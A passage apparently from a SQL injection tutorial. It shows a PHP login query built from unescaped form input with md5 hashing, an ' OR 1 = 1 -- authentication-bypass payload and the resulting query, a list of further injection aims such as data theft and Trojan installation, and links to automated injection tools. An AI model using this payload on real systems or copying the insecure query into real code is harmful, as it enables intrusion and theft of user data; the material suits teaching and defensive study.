SELECT * FROM users WHERE email = $_POST['email'] AND password = md5($_POST['password']);
Send from form:
login: xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ' ] pass: randompsw
Result sql query:
SELECT * FROM users WHERE email = 'xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ' ] AND password = md5('1234');
— — comment string after
Other SQL Injection attack types
SQL Injections can do more harm than just by passing the login algorithms. Some of the attacks include
Deleting data
Updating data
Inserting data
Executing commands on the server that can download and install malicious programs such as Trojans
Exporting valuable data such as credit card details, email, and passwords to the attacker’s remote server
Getting user login details etc
Automation Tools for SQL Injection
In the above example, we used manual attack techniques based on our vast knowledge of SQL. There are automated tools that can help you perform the attacks more efficiently and within the shortest possible time. These tools include
Havij for SQL Injection — Analize site for sql injections
SQLSmack — http://www.securiteam.com/tools/5GP081P75C.html
SQLPing 2 — http://www.sqlsecurity.com/downloads/sqlping2.zip?attredirects=0&d=1
SQLMap — http://sqlmap.org/